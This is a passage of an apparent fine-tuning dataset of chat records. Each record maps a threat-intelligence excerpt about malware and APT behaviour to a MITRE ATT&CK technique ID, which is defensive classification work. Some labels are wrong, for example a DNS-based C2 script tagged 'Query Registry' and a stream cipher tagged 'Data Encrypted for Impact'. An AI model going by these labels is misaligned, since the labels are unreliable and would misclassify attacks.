Cookie headers." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim's network by copying itself over network shares" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In contrast to the two samples used in these attacks, this one did not use a PE attachment, and instead used a Microsoft Word document containing a malicious macro as the delivery vehicle" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conclusion CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OilRig group maintains their persistent attacks against government entities in the Middle East region using previously identified tools and tactics. In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment. The attachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of OopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems. Attack Details In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT. The email subject was in Arabic, which translated to “Business continuity management training”. The email was sent to an address belonging to a user group, rather than a specific individual’s email address. Evasion Techniques The OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox checks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its functional code" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It uses the Windows service “winmgmts:\\\\.\\root\\SecurityCenter2 ” to check all AntiVirus products installed on the operating system. As shown below in the figure, it is done by creating the object the service “ winmgmts:\\\\.\\root\\SecurityCenter2 ” and executes the query “ Select * From AntiVirusProduct ” by using the same object that is created of a mentioned service" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Derusbi malware supports timestomping." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has the ability to download additional modules and a configuration file from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD has the ability to delete files on the compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - Screen Capture Tool— This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR — This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "zwShell can obtain the victim IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can be used to conduct packet captures on target hosts." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses COM hijacking as a method of persistence." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Much of the code inside the script is from the library “js-cookie” version 2.2.1. However, the attackers modified it and integrated a credit card skimmer into the original script. The skimmer binds at the events “mousedown” and “touchstart” of the payment submit button" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to \"openssl\" and then write the payload to the \"/tmp\" folder." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "discovers the current domain information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dns.ps1 script is also responsible for communicating with the C2 server, but it uses DNS queries to send data to the server. The DNS queries sent by this script are queries to subdomains on the same domain as the C2 server, which contains system information or the contents of files from the system. The subdomain of the DNS request that acts as the initial C2 beacon has the following structure" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has utilized Zlib compression to obfuscate the communications payload." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit" }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can install a new service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS establishes a backdoor over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy documents, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves can enumerate drives and Remote Desktop sessions." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The White Company has sent phishing emails with malicious Microsoft Word attachments to victims." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another batch script run by a scheduled task renames the archives on the file server (see Figure 15)" }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE has relied on victims opening a malicious Excel file for execution." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used DropBox URLs to deliver variants of PlugX." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider obtained a code signing certificate signed by Digicert for some of its malware." }, { "role": "assistant", "content": "T1588.003 - Code Signing Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT has the capability to to delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used HTTP for network communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The websites contain numerous articles and content to make them seem legitimate; in some cases the websites have over 10,000 individual news articles. Volexity has found the content is largely scraped and reposted in full from various other legitimate online news outlets. This appears to be done in an automated fashion and most likely through WordPress plugins. Numerous posted articles and images can be directly tracked back to other online blogs and newspapers; sometimes the byline or even watermark in images show directly where the article was sourced. In some cases, only a small number of pages on the site contains malicious code; in other cases, the profiling code is pervasive" }, { "role": "assistant", "content": "T1608.004 - Drive-by Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NavRAT uses the email platform, Naver, for C2 communications, leveraging SMTP." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST collected hostname, OS version, and device uptime." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMail can receive data and executable scripts from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy uses the \"tasklist\" and \"wmic process get Capture, ExecutablePath\" commands to gather the processes running on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path “/FeedBack.php”" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer can gather the IP address from the victim's machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Limited obfuscation was encountered, where the authors split up strings into smaller sub-strings and used ‘strcpy’ and ‘strcat’ calls to re-build them prior to use. They also used this same technique to generate garbage strings that are never used. Comments have been added to show the fully-generated strings" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When referring to additional plugins, it is worth noting that in early versions of Valak the plugins were downloaded by the second stage JS via PowerShell. More recent versions of Valak abandoned the popular yet easily detectable PowerShell downloader approach and transitioned to PluginHost as a means of managing and downloading additional payloads. This transition indicates that the Valak authors are looking for stealthier approaches and ways to improve their evasion techniques" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal can set the \"KeepPrintedJobs\" attribute for configured printers in \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\" to enable document stealing." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After that, stage 2 payloads are still retrieved as Bitmap (BMP) images that use Least Significant Bit (LSB) Steganography to hide the real payloads. These images appear normal in image viewers" }, { "role": "assistant", "content": "T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Table 3: FELIXROOT backdoor parameters Cryptography All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "service-based DLL implant traverses the FTP server’s directories looking for files with keyword matches for computer names or certain keywords." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers." }, { "role": "assistant", "content": "T1212 - Exploitation for Credential Access" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "’s installer is obfuscated with a custom crypter to obfuscate the installer." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It’s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes. It’s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. 9) Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI is heavily obfuscated and includes encrypted configuration files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon." }, { "role": "assistant", "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MURKYTOP has the capability to identify remote hosts on connected networks." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used Tor for C2." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Dust Storm, the threat actors sent spearphishing emails that contained a malicious Microsoft Word document." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline." }, { "role": "assistant", "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE uses WMI to perform discovery techniques." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installation file is an unsigned DMG image under the guise of Intego’s security solution for mac." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As mentioned, the registry key (HKLM\\SOFTWARE\\Microsoft\\DRM) is where the malicious payload is stored. In this case, this is the Pillowmint Trojan. Pillowmint is stored and compressed in the registry key" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has used FTP for C2 communications." }, { "role": "assistant", "content": "T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Helminth establishes persistence by creating a shortcut." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "hxxp://www.sanjosemaristas[.]com/app/index.php?{A01BA0AD-9BB3-4F38-B76B-A00AD11CBAAA}, providing the current network adapter’s service name GUID" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StreamEx has the ability to enumerate drive types." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Data field is encrypted using a custom stream cipher." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After “GetExtendedTcpTable” is executed and the process returns back to the second part of the code, it iteratively checks every record in the returned Tcp table. If any record contains the PID Waterbear wants to hide, it will remove the corresponding record, modify the record number inside the table, and continue to check the succeeding records" }, { "role": "assistant", "content": "T1562.006 - Impair Defenses: Indicator Blocking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks." }, { "role": "assistant", "content": "T1592.004 - Client Configurations" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "opens a backdoor on TCP ports 6868 and 7777." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sent spearphishing emails containing malicious Microsoft Office attachments." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS has connected to C2 servers through proxies." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OsInfo function in collects the current running username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor can create and execute services to load its payload." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ 